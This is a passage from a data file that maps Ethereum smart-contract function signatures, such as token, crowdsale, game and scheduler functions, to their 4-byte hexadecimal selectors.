"mintItem(address)": "0x691c65d4", "buyMultipleItems(uint8)": "0xd289eb82", "buyItem()": "0x795612d6", "mintTokensLocked(address,uint256)": "0x5c1d2215", "extendIco(uint256)": "0xdce579d1", "setGizerItemsContract(address)": "0x77e5f6d0", "setRedemptionWallet(address)": "0x954056f7", "tradeable()": "0xf5ac9db6", "GizerToken()": "0x763250e1", "COSHACNYToken(address)": "0xf8e8e035", "Billionscoin()": "0x0b1851a9", "DollarCoin()": "0xa3c49da0", "wordSize(string)": "0x09f92a6a", "increaseWordSize(string)": "0x337c445d", "PixelToken()": "0xaeefb9eb", "CryptoCourt(uint256,string,string)": "0x2ce2907b", "AllPay()": "0x468b0c1d", "create(address,uint256,uint256,uint256,bool)": "0x005f41cc", "ChiyouCulturalAcchain(uint256,string,uint8,string)": "0xe7af4540", "TraceToToken(address,uint256,uint256,address)": "0x6e66cc38", "Put(address)": "0xe5b5fe72", "PIGGY_BANK(address)": "0x3622b5ef", "findAuraComposite(uint64,uint64)": "0x4a0023cd", "aurasCompatible(uint64,uint8)": "0x7ab7a9fa", "addRandomTile(uint16,uint8)": "0x79008da5", "checkTeamToAdd(uint64,uint64,uint64)": "0x5ff77b22", "getNewTeamPositionAndCheck(uint16,uint8,uint64)": "0xf8605230", "getSpeed(uint64,uint64)": "0x51a76924", "addTeam2(uint64,uint64,uint64,uint16)": "0xce356e3a", "addTeam1(uint64,uint64,uint64,uint16)": "0x073ede30", "getInitialHP(uint64,uint64,uint64)": "0x12192b00", "closeBattleboard(uint16)": "0xd5aceaac", "createBattleboard(uint8)": "0x1d87a65c", "restrictionsAllow(uint64,uint8)": "0x0487eed2", "takePet(uint64)": "0x683328bf", "checkExistsOwnedAccessory(uint64)": "0xa20def62", "DataContacts(address,address,address,address)": "0x0d310998", "SmartLinkToken(uint256,string,string)": "0x28931484", "setAirdropEnabled(bool)": "0x360b3b31", "depositAndVest(address,uint256,uint256,uint256,uint256)": "0x3032236f", "setTokenVestingFactory(address)": "0xe8238688", "depositAndLock(address,uint256,uint256)": "0xa6da1e7d", "setTokenTimelockFactory(address)": "0x17711a46", "depositPresaleWithBonus(address,uint256,uint256,uint256)": "0x3871bdd7", "depositPresaleWithBonus(address,uint256,uint256)": "0xbaec1ced", "withdrawBonus(address[])": "0x0d3b7901", "withdrawBonus(address)": "0xb8b18915", "depositBonus(address,uint256)": "0x63ac0f99", "withdrawPresale(address[])": "0x62ef0e65", "withdrawPresale(address)": "0xc8b4eb6e", "withdrawPresale()": "0x6df5ee2b", "depositPresale(address,uint256,uint256)": "0xe76e9286", "depositPresale(address,uint256)": "0x0ad27798", "updateAsset(uint256,string,string,string,uint256)": "0xc687857c", "createAsset(string,string,string,uint256)": "0x369d8138", "Shiner()": "0x9af22f9c", "SingularityTest13()": "0x5f8b93d2", "placeBet(uint256,uint256)": "0x4afe62b5", "setGameActive(bool)": "0xccc08974", "ADULTEUM()": "0xb4b0a6e2", "MiracleToken()": "0xd9e73095", "BLUEOS()": "0xb896149c", "sha3(string)": "0x8810c990", "updateCandidate(address,string,string,uint256)": "0x9f373a7a", "toCloseVote()": "0xae01a8fb", "toOpenVote()": "0x002c8456", "KALToken()": "0x5067f32d", "GetAskingTokenMutiplier()": "0xf93231ba", "getAssetEmmiter(uint256)": "0x66c89a13", "Cygnal()": "0xc6dd8018", "CrowdsaleToken(uint256,uint8,address,bool,address)": "0xc00465ab", "ProdBToken()": "0x40217452", "ForFood()": "0x80078a0f", "tokenOfMakerByIndex(address,uint256)": "0x74063cc1", "amountsOf(address)": "0x6e4c9829", "generateLuckFactor(uint128)": "0x52aadf3b", "giftCharacter(address,uint8)": "0x0a3dfba7", "shareCertificate(string,string,string,address,address,string)": "0x32b4623a", "BATAGOR()": "0xff79d600", "ASUT()": "0xc8b6a463", "checkHash(string)": "0xe670f7cd", "setTimeStamp(string)": "0xddd57872", "Potato()": "0x2a47e08a", "returnFundsToClient()": "0x4bcf8645", "evaluateContract()": "0xa31cc317", "assignClientIfNotAssigned(address)": "0xe148bae9", "attorneySign()": "0x9e07d205", "clientSign()": "0xc95d8e40", "setCrowdsale(uint256,uint256,uint256)": "0x5b1214c6", "TestToken2()": "0xf386b8fd", "TransferEther(uint256)": "0x56b8edf0", "giveERC20AllowanceToKyber(address[])": "0x800c5086", "FNAToken()": "0x74281f95", "SMPLTSTToken()": "0xafcc8676", "Carpio()": "0xb65d0807", "CyberMilesToken()": "0x1f5e9a2a", "ConstantaToken()": "0x1866f761", "GexPayTest2Token()": "0x78ac19f9", "defineMecenas(address)": "0x6515c1fa", "getDonation(uint256)": "0xef07a81f", "messageForPeace(string)": "0xa9b5ae83", "OneBlocToken()": "0xab4e21c4", "foobarToken()": "0xa89d1eb9", "AppleToken()": "0xa0d045bc", "distributePENT(address[],uint256,uint256)": "0xdba01cfe", "withdrawl(address,address,bytes32)": "0xd41376e1", "tokensAlreadyClaimed(bytes32,address)": "0x0481cb1b", "SYS_Token()": "0xb12e9c41", "TransferAssets(address,uint256,address)": "0x44d60e67", "UpdateBalance(address,uint256,bool,address)": "0x6fa1532e", "updateUser(address,string,uint256,uint256,uint256,string,bool)": "0x4bb593b2", "updateUserDetailsInBulk(address[],uint256[],uint256[],uint256[],bool[])": "0xf1608682", "updateIsVerifiedInBulk(address[],bool[])": "0xc3aedd92", "updateIsVerified(address,bool)": "0xda02f5f3", "updateNickname(address,string)": "0x9aaa3eec", "registerUser(address,string,uint256,uint256,uint256,string,bool)": "0x431dac16", "TestGOATToken()": "0x56161605", "Amethycoin()": "0xda3f8c38", "MCS()": "0xbea677dd", "DolyToken4()": "0x49a24a7d", "DeathNode()": "0x50a85d36", "withdrawEscrowFees()": "0x795741c8", "deliveryReject(address)": "0xa3a4851a", "deliveryApprove(address)": "0x5d31c3bc", "purchaseReject(address)": "0xdeff3a37", "purchaseApprove(address)": "0xbbf76802", "purchaseCancel(address)": "0x2ee92639", "purchaseDeposit(address,uint256)": "0xa3ddc24a", "transferBond(uint256)": "0xfada2c18", "registerProduct(uint256,uint256,uint256,bytes,bytes)": "0xbe3912fa", "unregisterVendor()": "0xda26358a", "registerVendor(uint256,bool,bytes,bytes)": "0x9dd28e34", "ZenCoin()": "0xbbc7f045", "Propvesta()": "0xadda8cf4", "SLoader()": "0x0c3dfa0e", "EthereumNano()": "0xd4f2f1da", "AfricacoinToken()": "0x32bf9e5b", "JinuToken()": "0x18005d93", "weightOf(string)": "0x0f58d28f", "setERC20address(address)": "0xa88e34cb", "sellTokens(address)": "0xdeff30c6", "minimum_token_sell()": "0xcce1dfd2", "token_rate()": "0x1e5e8aa9", "expTx(uint256,uint256,uint256)": "0xd2134b26", "exp(uint256,uint256,uint256)": "0xb5debaf5", "checkMultOverflow(uint256,uint256)": "0x5111249e", "redeemTokens(uint256)": "0xa6e158f8", "RedemptionContract(address,uint256)": "0x0cb9da1b", "BCaaS()": "0xd420e4e0", "addBountyReward(uint256)": "0xf6879623", "claimBounty(uint256,string)": "0x1a426550", "setBounty(bytes32)": "0x19b6eabe", "HashBounty()": "0xd4971613", "TRONV()": "0x74be3c7f", "BELIBELA()": "0xfa7e4eaa", "EtherDeltaWithdraw(uint256)": "0xfc91e03d", "EtherDeltaDeposit(uint256)": "0x00882097", "EtherDeltaApproveToken(address,uint256)": "0xf766eca7", "EtherDeltaDepositToken(address,uint256)": "0x99d3acd3", "changeEtherDeltaDeposit(address)": "0x89165dcb", "EtherDeltaWithdrawToken(address,uint256)": "0x31f4a23f", "EtherDeltaTokenBalance(address)": "0xc0846957", "transferFromToken(address,address,address,uint256)": "0xfb3c0d70", "TradersWallet()": "0x4b2a4e18", "winningTeamId()": "0xd6948c47", "calculateWinnerCut(uint256,uint256)": "0xd21ad1ed", "settleLeague()": "0x817c7483", "calculateWinningEntries()": "0xa941c8d6", "determineGoalScoringCardIds(uint256[],uint256[],uint256)": "0x84b4d3f6", "determineAttackingOrDefendingOutcomeForAttributes(uint256,uint256,uint256,uint256,uint256)": "0x04ec70a7", "calculateAttributeTotals(uint256)": "0x4bf02421", "calculateGoalsFromAttributeTotals(uint256,uint256,uint256[],uint256[],uint256)": "0x8ec3167f", "calculateScorersForTeamIds(uint256,uint256)": "0x84fde1c6", "setMainContract(address,address)": "0xdf708f01", "hasEntered(address)": "0x24d70dea", "hasPreviouslyEnteredCardIds(uint256[])": "0xb5d1220a", "enterLeague(uint256[],uint256,bytes)": "0x33c8adce", "getPlayerCardIdsForTeam(uint256)": "0x5c3ffada", "getMatchAtRoundIdAtIndex(uint256,uint256)": "0xf15e3af1", "getAllMatchesForRoundId(uint256)": "0x07d71e73", "updateTeamsTableAttributes(uint256,uint256,uint256,uint256)": "0xa53f138a", "calculateMatchOutcomesForRoundId(int256)": "0xad714012", "startCompetition()": "0xd3e66a9e", "openCompetition()": "0xb8a393b8", "createPrizePool(uint256[])": "0xaf4a2984", "generateFixtures()": "0xfe1391ad", "BCFLeague(address,uint256,uint256,uint256,uint256)": "0xd6dad4cb", "testConnection()": "0x3412a15c", "contractBurn(address,uint256)": "0x39b22120", "registerExternal()": "0xc42b5fe1", "_buy(address)": "0x42fd7d4c", "trasnferFromOwner(address,uint256)": "0xcbca02d3", "registerAccount(address)": "0x97c414df", "changeBank(address)": "0x361d004f", "untrustContract(address)": "0xfde45344", "trustContract(address)": "0x314e39c3", "getMultiplier()": "0x40490a90", "getbuyPrice()": "0x3f80a82b", "SisterToken(uint256,string,string)": "0xeb9c9708", "CGT()": "0x7a95f174", "ENKToken()": "0xd0f86fec", "checkVestingCondition(address)": "0xd3cecc4d", "checkVestingTimestamp(address)": "0x6f64ccf5", "addVestingAddress(address,uint256)": "0x755db762", "isInGracePeriod()": "0xcf27d016", "getProjectedPayout(bool,uint256,uint256)": "0x728516c2", "getProjectedPayout(uint16)": "0x1bb2921b", "getForSalePrices(uint16)": "0xb4f6aa56", "getSystemSalePrices()": "0xab4c4487", "getPropertyData(uint16)": "0x09ddc583", "_transferProperty(uint16,address,uint256,uint256,uint8,address)": "0x43235a24", "_tryTriggerPayout(uint16,uint256)": "0xbddd3202", "changeOwners(address)": "0xd7963f94", "makeBid(uint16,uint256)": "0xae813029", "delist(uint16)": "0xba086518", "listForSale(uint16,uint256)": "0xb047f245", "buyPropertyInETH(uint16)": "0x0ad50c02", "buyPropertyInPXL(uint16,uint256)": "0x32a42882", "buyProperty(uint16,uint256)": "0xe829945a", "transferProperty(uint16,address)": "0x1db93968", "setPropertyMode(uint16,bool,uint32)": "0xa72aa163", "setRowColors(uint16,uint8,uint256,uint256)": "0x1286d9e8", "setColorsX8(uint16[8],uint256[40],uint256)": "0x51846028", "setColorsX4(uint16[4],uint256[20],uint256)": "0x9cfda697", "setColors(uint16,uint256[5],uint256)": "0x35b11b72", "tryForcePublic(uint16)": "0x1e7769de", "setLink(uint256[2])": "0xd56a4555", "setHoverText(uint256[2])": "0xacd9930b", "getSaleInformation()": "0xf1ab36b4", "setPXLPropertyContract(address)": "0x6b1ac900", "VirtualRealEstate()": "0x4bc8c477", "SecureEgg()": "0xca855a57", "TCC()": "0x0288ab5d", "FLescoin(address,address)": "0x09936cd6", "getConversionInfo(string)": "0xe8e0d5bf", "writeConversion(string,address,uint256,uint256)": "0x77dcba6d", "Offer(address,string,address)": "0x95e517be", "BOC(uint256,string,string)": "0xa641edc7", "TCoin()": "0xf7fd2e19", "directMintAgent()": "0x6abc3fe4", "tokenPriceInEuroCents()": "0x3e87d301", "priceForVerificationInWei()": "0x09905bdb", "betters()": "0xb3c3bbbd", "PUBLIC_SALE_END()": "0x57607ddd", "POINT_ROOTNODE_ROLE()": "0x307482cf", "balance1()": "0xc45c4f58", "MAT_TEAM_SUPPLY_LIMIT()": "0x08753085", "MAX_SITE_ID()": "0x1a5b8f96", "CollectibleIndex4()": "0xafa01c90", "COMMISSION()": "0x562df3d5", "startTransfers()": "0x773dcb98", "lastcombo()": "0x34e23416", "Make_Deposit()": "0x2f5c3102", "sale1Started()": "0x6f414fbb", "_phase2Supply()": "0x65d51dd5", "proposalsCnt()": "0x21b4b3dc", "emperor()": "0xf5e27f5f", "timeoutAt()": "0x102e58d0", "whitehat()": "0x3c9c4001", "sellTradeConfir()": "0x46e3cb1a", "EDU_PER_ETH_EARLY_PRE_SALE()": "0x23169fca", "tokensPerWei20()": "0x6a585fa3", "TotalInvested()": "0x056e4d88", "publicSaleEtherRaised()": "0xba9398e9", "getAdministratorETH()": "0xd3614854", "market_WithdrawWei()": "0x7b151be0", "isSellable()": "0xd6e95f77", "TOKEN_SALE_LIMIT()": "0xd576dc58", "currentPrivateSale()": "0xad220cf1", "presaleUnlimitedStartBlock()": "0x91176f39", "bonusSignalValue()": "0x24999c9c", "highestBalance()": "0x94ca9f90", "withdrawnTeam()": "0x6dc4faea", "removeOwner()": "0x246f8b96", "totalFundsReceived()": "0xbf27f585", "PublicMine()": "0x87ccccb3", "finalWinner()": "0x1e0419d4", "incrementFee()": "0xa0109c9f", "MAX_GEN0_GIRLS()": "0xe58c68bc", "maxUSD()": "0x2ac71c16", "ATT()": "0xa1ee7855", "checkPriceCalled()": "0x28687e61", "icoBonus1()": "0xd531eeaa", "heal()": "0x0434fe0b", "minbet()": "0x64027fbb", "RATE_DAY_28()": "0x7e36edce", "gvOptionToken30()": "0x02825adc", "altDeposits()": "0x4a88eb89", "hank()": "0x2d2fa531", "transferredPresale()": "0x9c3c7b2c", "BOOKIE()": "0x5d5655dd", "freezOne()": "0x2099940e", "ICO_PERCENTAGE_4()": "0xe08155dd", "completeMinting()": "0xa844545d", "badgerAmount()": "0xd85874b9", "reservedteamtoken()": "0xbbd3684c", "bidEMONTIncrement()": "0x51a282ae", "_saleSupply()": "0x3bc5b73e", "child()": "0x237b5e96", "BATsPerEth()": "0xd89bcaaa", "ethPriceIn()": "0x8ca79351", "getFunctions()": "0x95648f1b", "airSwap()": "0x370099d4", "couponTokenCampaignAddr()": "0xab19d396", "payoutBalance()": "0x20b0554e", "authorShare()": "0x544082e5", "publicTGEEndBlockTimeStamp()": "0x91378456", "weiFundingCap()": "0x4da1b25d", "totalLimit()": "0xa36298c7", "scaling()": "0xcbfa3c9c", "roundsCount()": "0x9f5cfe03", "capWalletAddress()": "0x06ac1527", "canPause()": "0x323be1c5", "getPlotPrice()": "0xef323d85", "maxCapUSD()": "0xd5f5b788", "ethGoal()": "0x03335d04", "OWNER_SUPPLY()": "0xb662dc9b", "getCommitThreshold()": "0x5fee8a4b", "MIN_TOTAL_AMOUNT_TO_RECEIVE_ETH()": "0x05dd686f", "resetAlias()": "0x85ed5cf9", "numOfMythical()": "0x588e730c", "lifeFactor_ii()": "0x7b47cb68", "shiny()": "0xcb7729d3", "startTde()": "0x423592ce", "DEFAULTED_STATUS()": "0xad0b6013", "rinkeby2()": "0x5e916b46", "MINING_SUPPLY()": "0xbf417b9f", "_tokenAllocator()": "0xe58dede7", "currentHolders()": "0x3cb32f77", "landmarkPriceStepDenominator()": "0x64dab033", "KIN_PER_USD()": "0xe264a2f4", "min_shares_to_sell()": "0x8237bbf0", "preIcoStartDate()": "0x79c3199d", "crowdSaleZxcSupply()": "0xb3b78cc2", "totalBaseLareSoldInMainSale()": "0x3136fbb8", "txFeeSentInWei()": "0xfba0aa5b", "totalNights()": "0x239a2545", "FundingAssetAddress()": "0x6cef5ff4", "totalHardCap()": "0x67a3eb65", "getSubOrderStatus(uint256,address)": "0x3018c90a", "updateIndexOrderToken(uint256,address,uint256,uint256,uint256)": "0x282e0fe0", "getIndexOrder(uint256)": "0xeff6e83d", "initializeArray(uint256)": "0x334b9f14", "buyIndex(uint256,address,bool)": "0x0fb9d85e", "getStrategyTokenPrice(uint256,uint256)": "0x7c6fdec5", "getPrice(address,uint256)": "0x449e815d", "getStrategyTokenAndWeightByIndex(uint256,uint256)": "0xcb55adfb", "OlympusLabsCore(address)": "0xae2c923c", "updateFollower(uint256,bool)": "0x394a3f61", "incrementStatistics(uint256,uint256)": "0x06e840ea", "updateStrategy(uint256,string,string,string,address[],uint256[],bytes32)": "0xd4ffd1bd", "createStrategy(string,string,string,address[],uint256[],bytes32)": "0x781327de", "getStrategy(uint256)": "0xcfc0cc34", "getStrategyTokenByIndex(uint256,uint256)": "0x5998e641", "getStrategyTokenCount(uint256)": "0x81c59c8d", "getStrategyCount()": "0x31e19cfa", "getOrderId()": "0xa8496426", "getCustomField(uint256,bytes32)": "0x92a08dd1", "addCustomField(uint256,bytes32,bytes32)": "0x8091d7a5", "resetOrderIdTo(uint256)": "0x3b19a17d", "getIndexToken(uint256,uint256)": "0xd6dfb77a", "getIndexOrder2(uint256)": "0xb77825d2", "getIndexOrder1(uint256)": "0x6cc341f1", "getOrderTokenCompletedAmount(uint256,address)": "0xe5e51bd7", "addOrderBasicFields(uint256,address,uint256,uint256,bytes32)": "0xea1e572b", "addTokenDetails(uint256,address[],uint256[],uint256[],uint256[])": "0xd49ad161", "getAccessor(bytes32,uint256)": "0x13e7a234", "getCustomExtraData(bytes32,uint256,bytes32)": "0xfb54047c", "setCustomExtraData(bytes32,uint256,bytes32,bytes32)": "0xa1fb34c1", "getRates(address,uint256)": "0xddfafa96", "checkProviderSupported(address,address)": "0x5950cee4", "checkExchangeSupported(bytes32)": "0xbb502dd9", "checkTokenSupported(address)": "0x81f8a6f7", "getNonce(address,address)": "0xd828435d", "getNewCustomPrice(address,address)": "0xdac4fcdb", "getNewDefaultPrice(address)": "0x093e9633", "updatePrice(address,bytes32[],uint256[],uint256)": "0x6555394b", "endPlaceOrder(uint256)": "0x82771ff4", "startPlaceOrder(uint256,address)": "0x46689c64", "getExpectAmount(uint256,uint256,uint256)": "0x6181d565", "ExchangeAdapterBase(address,address)": "0xe20e36a0", "has(address,string)": "0x9909afed", "adminRemove(address,string)": "0xdd722127", "adminAdd(address,string)": "0x40ff26ba", "setProvider(uint8,address)": "0xf8d1f5f0", "INV()": "0x12ea0b0e", "PibbleToken()": "0x2a6865e3", "testBadWithGoodInterface(address,uint256,address,uint256)": "0xb8547736", "EphronTestCoin(uint256,uint256,uint256,string,string,uint256)": "0x47816131", "set_addresses(address,address)": "0x471efe66", "Send69Wei()": "0x173febeb", "_createCar(string,address,uint256)": "0xb2f2b06d", "getCar(uint256)": "0x5e8be190", "createContractCar(string)": "0x900d33d9", "createPromoCar(address,string,uint256)": "0x2a2879d3", "CryptocarToken()": "0x67707337", "Sale(address,address,address)": "0x2e7d6253", "KEM()": "0x7462260b", "LookRevToken(address,uint256)": "0xbac6241f", "HDT_Token()": "0xd7cf1d20", "SetFreeGWT(uint256)": "0x90b398ff", "SetExtra(uint256)": "0xf30faff6", "SetupML(uint256,uint256,uint256,uint256)": "0xd4d42c91", "SetupGWT(string,string,uint256,uint256,uint256,address,address,uint256)": "0x761c1cf9", "GoWalletToken()": "0x82544c1f", "claimFutureUse()": "0xd2db29af", "loadBalances(uint256[])": "0x3c21b968", "startClaim()": "0xecbfc077", "YUPTimelock(uint256,uint256,address,uint256)": "0x82d74005", "update(uint256,uint256)": "0x2fb565e8", "buyFuel(address)": "0xe52eb288", "boughtToday(address)": "0x51d10161", "todayReserved()": "0xf2c402b6", "todaySold()": "0x4bc4549c", "todaysSupply()": "0x536cfceb", "HoloSale(uint256,uint256,uint256,uint256,uint256,address)": "0x06b96bb4", "holosForWei(uint256)": "0xc397ae1b", "reservedTokens(address,uint256)": "0xe74a48be", "setReservedTokens(uint256,address[],uint256[])": "0xb413c923", "unwhitelist(address[])": "0xad44e73b", "whitelist(address[])": "0xbd8aa780", "setUpdater(address)": "0x9d54f419", "HoloWhitelist()": "0xf5596659", "setDestroyer(address)": "0x6a7301b8", "getSender(bytes32)": "0x03d2107f", "timestamp(bytes32)": "0x4d003070", "ManagedToken(string,string,uint8)": "0xc7277115", "multisend(address[],uint256)": "0x2dc9ad7f", "userUnlockToken(uint256)": "0xb10cf224", "ownerUnlock(address,uint256)": "0x40528f98", "lockToken(address,uint256,uint256)": "0x839972f9", "punish(address,address,uint256)": "0x9748dcdc", "getMilk()": "0xcdc7076d", "removeCooldown()": "0xcd041ae9", "buyCow()": "0x4599308f", "countMilk()": "0xc4a4cb4e", "countCows()": "0x3ab2dcec", "getCow(uint256)": "0x34df9b60", "TBToken()": "0xa57f57f8", "testRestart()": "0x465e759b", "testThrowsRestartEnforceRevisions()": "0x5292c1a9", "testThrowsRestartNotUpdatable()": "0x1b769e74", "testRetractLatestRevision()": "0x40695625", "testThrowsRetractLatestRevisionDoesntHaveAdditionalRevisions()": "0xe0cfc05c", "testThrowsRetractLatestRevisionEnforceRevisions()": "0x8e1ffb19", "testThrowsRetractLatestRevisionNotUpdatable()": "0xe82f7dd4", "testUpdateLatestRevision()": "0x1fb2f2a0", "testThrowsUpdateLatestRevisionEnforceRevisions()": "0x2eb5c61f", "testThrowsUpdateLatestRevisionNotUpdatable()": "0x13137731", "getAllRevisionBlockNumbers(bytes20)": "0x22057bc7", "getRevisionBlockNumber(bytes20,uint256)": "0x74f8d96e", "getRevisionCount(bytes20)": "0x3ef87414", "getOwner(bytes20)": "0xe487eb58", "getTransferable(bytes20)": "0xaa5d4719", "getRetractable(bytes20)": "0x3c335b0e", "getEnforceRevisions(bytes20)": "0xdba1ac3d", "getUpdatable(bytes20)": "0x3df91162", "getFlags(bytes20)": "0x01fd89a4", "getInfo(bytes20)": "0xba15e52e", "_getAllRevisionBlockNumbers(bytes20)": "0xec035393", "_getRevisionBlockNumber(bytes20,uint256)": "0xfb47a067", "getExists(bytes20)": "0x08b7c13b", "setNotTransferable(bytes20)": "0xb971b4e5", "setNotRetractable(bytes20)": "0x976b01c0", "setEnforceRevisions(bytes20)": "0x9243e088", "setNotUpdatable(bytes20)": "0xd0c24e93", "disown(bytes20)": "0xd6ca8ccb", "transfer(bytes20,address)": "0xb06df18e", "transferDisable(bytes20)": "0x47bdb7f4", "transferEnable(bytes20)": "0x12511c14", "retract(bytes20)": "0xcf7315c6", "restart(bytes20,bytes)": "0xe0a70811", "_deleteAllPackedRevisionBlockNumbers(bytes20)": "0x5ccd2f9b", "retractLatestRevision(bytes20)": "0xa7e93e87", "updateLatestRevision(bytes20,bytes)": "0x9e65c7e5", "createNewRevision(bytes20,bytes)": "0xa84c5330", "_setPackedBlockNumber(bytes20,uint256)": "0x338a1379", "create(bytes32,bytes)": "0x5b37e150", "getIpfsHash(address,address)": "0xd0b52156", "setIpfsHash(bytes)": "0x337b1cf9", "WillRegistry()": "0x7fefde53", "create(bytes1,bytes32,bytes)": "0xe597f402", "testMakeItFail()": "0x8d375da2", "getFlags(bytes32)": "0x2551858e", "create(bytes,bytes32,bytes1)": "0x5f0edfb8", "testCreateNewRevision()": "0x85b73d3c", "testThrowsCreateNewRevisionNotUpdatable()": "0xa5dfee67", "testCreate()": "0xd62d3115", "testThrowCreateExistingNonce()": "0x29e30910", "testBlobStoreRegistered()": "0xfa3f1e99", "testThrowBlobStoreNotRegistered()": "0x59e2d30e", "testThrowRegisterContractAgain()": "0x741273d6", "testBlobCreate()": "0x1ac61e8c", "claimOwnershi()": "0xcd2cdd5b", "makeDecision(uint256,bool)": "0x043753ba", "TransactionRecorder()": "0x6b9b1006", "TimestampScheduler(address)": "0xba8661a2", "BlockScheduler(address)": "0x81baf820", "validateEndowment(uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0x27960c5f", "computeEndowment(uint256,uint256,uint256,uint256,uint256,uint256)": "0x5ee345e4", "GAS_BUFFER()": "0xc7e67360", "EXECUTION_GAS_OVERHEAD()": "0x45104b16", "PRE_EXECUTION_GAS()": "0xd96d7ea2", "scheduleTransaction(address,bytes,uint256[7],uint256)": "0x316b08a0", "createValidatedRequest(address[3],address,uint256[11],uint256,bytes)": "0x15abc160", "validateRequestParams(address[3],address,uint256[11],uint256,bytes,uint256)": "0x30aceb89", "BaseScheduler(address,address,uint256)": "0xb69c0896", "TimestampScheduler(address,address)": "0x7b632c41", "sendProxyTransaction(address,uint256,uint256,bytes)": "0x51582ef3", "toggle()": "0x40a3d246", "ErrorGenerator()": "0x6aaba012", "__reset__()": "0x7cbcc254", "__dig_then_proxy(uint256)": "0x9a35f886", "__dig_then_proxy(uint256,address,bytes)": "0xf10ae2ab", "__proxy(address,bytes,uint256)": "0x9af605cb", "__proxy(address)": "0xad8ed335", "CANCEL_EXTRA_GAS()": "0xd2531590", "EXECUTE_EXTRA_GAS()": "0x1d49e081", "sendOrThrow(address,uint256)": "0x9341231c", "scheduleTransaction(address,bytes,uint8,uint256[3],uint256)": "0x433836dc", "spinTheWheel(address)": "0xe56c8552", "changeSettings_only_Dev(uint256,uint256,uint256,uint256,uint16,uint256,uint256,uint256,uint8,uint8)": "0xc7144269", "splitProfitVIP_only_Dev()": "0xbb84d362", "changeDeveloper_only_Dev(address)": "0x7c9cd7df", "enableBetting_only_Dev()": "0x750cae6a", "investmentEntryInfos()": "0x6ad50ed4", "disableBetting_only_Dev()": "0x580bdf3c", "getTotalGambles()": "0x402e6230", "transferInvestorAccount(address,address)": "0x33ce7787", "voteOnNewEntryFees_only_VIP(uint8)": "0x2e0ef395", "manualUpdateBalances_only_Dev()": "0x266710ca", "register(bytes12)": "0xc5f310c0", "all(bool[7])": "0x4ed4831a", "scheduleTransaction(address,bytes,uint8,uint256[6],uint256)": "0x3c894475", "scheduleTransaction(address,bytes,uint8,uint256[5],uint256)": "0xa42e36c6", "scheduleTransaction(address,bytes,uint256[5],uint256)": "0xd4c2b6b1", "scheduleTransaction(address,bytes,uint256[4],uint256)": "0xceba30b5", "scheduleTransaction(address,bytes,uint256[3],uint256)": "0x314e0fb6", "scheduleTransaction(address,uint256,uint256,uint256,bytes)": "0xc9296d14", "allowDefaultToken(address,bool)": "0xf0fb8efd", "AllInOne()": "0x5fd56dfc", "XLifeCoin()": "0x49f4f5da", "ETY(address)": "0x34302882", "setBuyerAddress(address)": "0x1b697bb2", "setAmountToReceive(uint256)": "0x8357c2f0", "setTimeLimit(uint256)": "0xe2889c82", "setPrivateSaleHalt(bool)": "0xdfd4e0f6", "AlekseiZaitcevPrivateSale(uint256,uint256,uint256,address)": "0xc8335143", "startBuy()": "0x161895eb", "CryptoWuxiaVoting()": "0x4dfa2722", "BuyRoseCoin()": "0x250ac096", "EliteShipperToken()": "0x7dbbc0cd", "Jackpot()": "0x5e377b51", "transferBallance()": "0x9aeceb1d", "ECT(uint256,string,uint8,string)": "0x8d28da21", "OQToken()": "0xbfb7896d", "Valeriumcoin()": "0xd882ad5e", "setAdmin(address[],bool)": "0x84e7686b", "T20coin(uint256,string,uint8,string)": "0xfd4dbdf2", "TrackChain()": "0xea89c6bc", "B42Token()": "0xc8eb747a", "MANHATTANPROXY10THAMSTAVE()": "0x9ccfceed", "LAF()": "0x833888f0", "MGCGameToken()": "0x32e70029", "TUPC()": "0xcc679ffc", "Renmin(uint256,string,uint8,string)": "0x6547c080", "ETSToken(address)": "0xb8642896", "withdrawCloneTokens(address)": "0xd6906295", "AMPIToken()": "0x18b49ba4", "Thechampcoin()": "0x6c6288e4", "CardiumToken()": "0x6cf339f8", "ATMGold(uint256,string,uint8,string)": "0xcc6c010d", "TheFlashToken(uint256,string,string)": "0xfcad399f", "UDCC()": "0x1a690752", "haveExtension(string)": "0xfa6e5776", "getExtensionPublication(string)": "0x38200801", "Contributor(string,address,address)": "0xf2342cd5", "PollManagedFund(address,address,address,address,address,address,address,address,address[])": "0x044166ec", "autoRefundCrowdsaleContributor(address)": "0xe2d2a868", "setLockedTokenAddress(address)": "0x7ddbf0ed", "Fund(address,address,address,address,address,address,address,address,address[])": "0xd76a69e2", "LKYToken(uint256,string,string)": "0xa1446287", "Disco()": "0xe239ccba", "ALAX()": "0x6cc95f8d", "BOF()": "0xcd572a07", "XBLToken()": "0xfbfc1653", "Lucky()": "0x963c0724", "Hedge()": "0xc7fa1d47", "OVCLockAllocation(uint256,address,address,address)": "0xe0b30178", "transferUnsoldToken()": "0xac8aea24", "changeOVCPerEther(uint256)": "0x01ecaca5", "OVC()": "0xd1a634e6", "ShanDianLian()": "0x79f16ba1", "SuperTroopersRTscore()": "0x39ac2d9b", "feeDiv(uint256,uint256)": "0xe01e0618", "PoWHrGlass()": "0x5ce4f8dc", "ERH()": "0x32895c2a", "getActivityAccountInfo(address)": "0x82f1ec1f", "addActivityAccount(address,uint256,string)": "0x48ce382d", "airDropSame(address[],uint256)": "0x079c9fbb", "airDropCustom(address[],uint256[])": "0x76937a3f", "POOToken()": "0xadd769a3", "CNY_Omnidollar()": "0xfa729b5b", "INKCToken()": "0xa5b067b3", "Bitether()": "0x035340f1", "MeetOneToken()": "0x7838415b", "MeetOneTokenBase()": "0xf0d6ff48", "_assignOverlfowData(uint256)": "0x93f27be2", "_calcNextRate()": "0x0c62bfbb", "Maesawa()": "0x7a02eb1d", "setaddress(address,address,address,address)": "0x410dbad6", "setfees(uint256,uint256,uint256,uint256)": "0x6d7b3706", "TMCoin()": "0x31ab6055", "ETHealth()": "0xf2e79ab7", "EtherHealth()": "0x585c6fc9", "getThree()": "0x0e2f5fb3", "DominionCoin()": "0x0358395d", "GCOXAPLToken(string,string,uint8,uint256)": "0xd3c13c25", "DCTR()": "0x1e82965e", "NASRToken()": "0xf5e8e8a9", "RedSoxYankees412()": "0x40e1e62b", "transferLeftover()": "0x70459be2", "concatYearMonth(uint16,uint8)": "0xe3b08f56", "getNextFetchTime()": "0x99554e7b", "calculateCommission(uint256)": "0xce9b4321", "updateCheckHourly(bool)": "0x582b4019", "updateCanRefund(bool)": "0x6beb509d", "updateCanFetch(bool)": "0x206607f2", "updateCutoff(uint24)": "0xf1fc4db4", "closeContract()": "0x610be654", "calculatePayout(uint256,uint16)": "0x814e23c8", "calculatePayoutVariables()": "0xbe0ad4d1", 